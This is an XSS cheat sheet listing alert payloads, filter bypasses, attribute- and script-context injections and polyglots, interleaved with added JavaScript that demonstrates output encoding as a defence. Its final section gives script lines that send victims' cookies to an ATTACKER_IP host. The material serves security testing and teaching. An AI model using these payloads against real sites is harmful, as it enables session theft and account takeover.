# Cross-Site Scripting (XSS)

## Types of XSS

| Type | Description |
|---|---|
| Reflected | The malicious script is reflected off the web application into the victim's browser (requires the victim to follow a crafted link). |
| Stored | The malicious script is permanently stored on the target server (e.g. in a database); the victim loads the infected page. |
| DOM-based | The vulnerability lies in client-side code (JavaScript that handles untrusted data in the page) rather than in server-side code. |
## Basic Payloads

Simple checks to verify an XSS vulnerability.

| Payload | Context |
|---|---|
| `<script>alert(1)</script>` | Standard script tag |
| `<script>confirm('XSS')</script>` | Standard confirm dialog |
| `<script>prompt('XSS')</script>` | Standard prompt dialog |
| `<img src=x onerror=alert(1)>` | Image tag with an invalid source triggers the error handler |
| `<svg onload=alert(1)>` | SVG onload event |
| `<body onload=alert(1)>` | Body onload event |
| `<iframe src="javascript:alert(1)">` | Iframe with the javascript: protocol |
## Filter Bypasses

### Case Insensitive & Spacing

| Payload | Description |
|---|---|
| `<ScRiPt>alert(1)</sCrIpT>` | Mixed case to bypass an exact-match filter |
| `<img src=x onerror = alert(1)>` | Spaces around the equals sign |
| `<svg/onload=alert(1)>` | Slash instead of a space |
### Attribute Injection

If the input lands inside a tag: `<input value="USER_INPUT">`

| Payload | Resulting HTML |
|---|---|
| `"><script>alert(1)</script>` | Closes the tag and starts a new script element |
| `" onmouseover="alert(1)` | Injects an event handler attribute |
| `" autofocus onfocus="alert(1)` | Focus event fires automatically |
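Why the bypass and attribute payloads above defeat a blocklist but not output encoding, as an added example (JavaScript, not from the cheat sheet): a filter that strips exact tokens such as `<script>` or `onerror=` misses the mixed-case, extra-space and slash variants, whereas encoding every parser-significant character for the HTML context neutralises all of them. The same block covers the attribute-injection table above: once the input is entity-encoded, the template's own two double quotes are the only ones in the output, so the attribute can never be closed. All payload strings are constructed test inputs copied from the tables; `naiveBlocklist`, `encodeForHtml`, the two render functions and the detector regex are names and logic written for this illustration, not any library's API.

```javascript
// Added example (not from the cheat sheet). All inputs below are constructed
// test strings taken from the filter-bypass and attribute-injection tables.

const BYPASS_PAYLOADS = [
  '<ScRiPt>alert(1)</sCrIpT>',        // mixed case
  '<img src=x onerror = alert(1)>',   // spaces around "="
  '<svg/onload=alert(1)>',            // slash instead of a space
];

const ATTRIBUTE_PAYLOADS = [
  '"><script>alert(1)</script>',
  '" onmouseover="alert(1)',
  '" autofocus onfocus="alert(1)',
];

// A weak blocklist "sanitizer": exact-match removal of a few known tokens.
// This is the style of filter the payloads above are written to defeat.
function naiveBlocklist(input) {
  return input
    .replace(/<script>/g, '')
    .replace(/<\/script>/g, '')
    .replace(/onerror=/g, '');
}

// Output encoding for HTML text and quoted-attribute contexts: every character
// that can change the parser's state becomes an entity, so the browser treats
// it as literal text regardless of case or spacing tricks.
function encodeForHtml(input) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;' };
  return String(input).replace(/[&<>"'\/]/g, (c) => map[c]);
}

// Scoring detector only: does the output still contain a script element or a
// tag carrying an on* handler? Case-insensitive, and "/" counts as whitespace
// the way the HTML tokenizer treats it.
function stillContainsActiveMarkup(html) {
  return /<\s*script\b/i.test(html) || /<[a-z]+[^>]*[\s\/]on[a-z]+\s*=/i.test(html);
}

function compareFilters(payload) {
  return {
    blocklist: stillContainsActiveMarkup(naiveBlocklist(payload)),
    encoded: stillContainsActiveMarkup(encodeForHtml(payload)),
  };
}

// Attribute context from the table above: <input value="USER_INPUT">.
function renderInputValueUnsafe(userInput) {
  return `<input value="${userInput}">`;
}

function renderInputValue(userInput) {
  return `<input value="${encodeForHtml(userInput)}">`;
}

// The attribute is intact only if the template's two quotes are the only quotes
// in the output and no second tag was opened.
function attributeStaysClosed(html) {
  const quotes = (html.match(/"/g) || []).length;
  const tags = (html.match(/</g) || []).length;
  return quotes === 2 && tags === 1;
}

// Stand-alone run: print a small scoreboard for every constructed payload.
for (const p of BYPASS_PAYLOADS) {
  console.log(JSON.stringify(p), compareFilters(p));
}
for (const p of ATTRIBUTE_PAYLOADS) {
  console.log(JSON.stringify(p),
    'unsafe closed:', attributeStaysClosed(renderInputValueUnsafe(p)),
    'encoded closed:', attributeStaysClosed(renderInputValue(p)));
}
```

Running it shows the blocklist leaving every bypass payload active while the encoded output contains no `<` at all, and the unsafe attribute template yielding three or four quotes (the attribute was closed) where the encoded template always yields exactly two.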
### JavaScript Context

If the input lands inside a script: `<script>var x = 'USER_INPUT';</script>`

| Payload | Resulting JS |
|---|---|
| `';alert(1);//` | Closes the string, injects the alert, comments out the rest |
| `'-alert(1)-'` | Stays inside the expression; the arithmetic forces the function call |
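As an added example (not from the cheat sheet), the `<script>var x = 'USER_INPUT';</script>` template above is rendered both with raw concatenation and with a JavaScript string-literal encoder, then executed in Node with `alert` replaced by a counter so the effect of each payload is observable. `renderUnsafe`, `renderSafe`, `encodeForJsString` and `runSnippet` are names chosen for this illustration. The encoder hex-escapes every non-alphanumeric character, which is the usual recommendation for a JS string context; HTML entity encoding is the wrong tool here because a script block does not decode entities, so the value would arrive corrupted. Because `<` and `/` are escaped too, a value containing `</script>` cannot terminate the surrounding script element either.

```javascript
// Added example (not from the cheat sheet): the <script>var x = 'USER_INPUT';</script>
// pattern rendered unsafely and with JS-string encoding, then executed in Node with a
// stubbed alert(). The payloads are constructed inputs copied from the table above.

const JS_CONTEXT_PAYLOADS = [
  "';alert(1);//",   // closes the string, runs alert, comments out the rest
  "'-alert(1)-'",    // stays inside an expression; subtraction forces the call
];

// Vulnerable template: string concatenation straight into a JS string literal.
function renderUnsafe(userInput) {
  return `var x = '${userInput}';`;
}

// Encoder for a JavaScript string-literal context: every character outside
// [A-Za-z0-9] becomes a \xHH or \uHHHH escape. Quote, ";", "-", "<" and "/" are
// all covered, so neither the string nor the enclosing <script> can be closed.
function encodeForJsString(input) {
  return String(input).replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// Safe template: same shape, but the value passes through the encoder first.
function renderSafe(userInput) {
  return `var x = '${encodeForJsString(userInput)}';`;
}

// Execute a rendered snippet with alert() replaced by a counter and return what
// x ended up holding plus how many times alert() fired.
function runSnippet(jsBody) {
  let fired = 0;
  const fn = new Function('alert', jsBody + '\nreturn x;');
  const value = fn(() => { fired += 1; });
  return { value, fired };
}

// Stand-alone run: show both renderings side by side for each payload.
for (const p of JS_CONTEXT_PAYLOADS) {
  console.log('payload :', JSON.stringify(p));
  console.log('  unsafe:', runSnippet(renderUnsafe(p)));
  console.log('  safe  :', runSnippet(renderSafe(p)));
}
console.log('encoded </script>:', encodeForJsString('</script>'));
```

In the unsafe rendering the first payload leaves `x` empty and calls `alert` once, and the second evaluates to `NaN` with one call; the encoded rendering returns every payload unchanged as the value of `x` with zero calls.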
### Polyglots

Payloads designed to work in multiple contexts (HTML, attribute, script). Each line below is one payload.

```text
javascript://%250Aalert(1)//" autofocus onfocus=alert(1) src=1 onerror=alert(1) type=image/svg+xml onload=alert(1)
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
```

## Cookie Stealing

Send the victim's cookies to an attacker-controlled server (RequestBin / Burp Collaborator).

```html
<script>fetch('http://ATTACKER_IP/?cookie=' + btoa(document.cookie));</script>
<script>new Image().src = "http://ATTACKER_IP/?c=" + document.cookie;</script>
```

⚠️ Educational Purpose Only. Use these payloads only on systems you own or have explicit permission to test.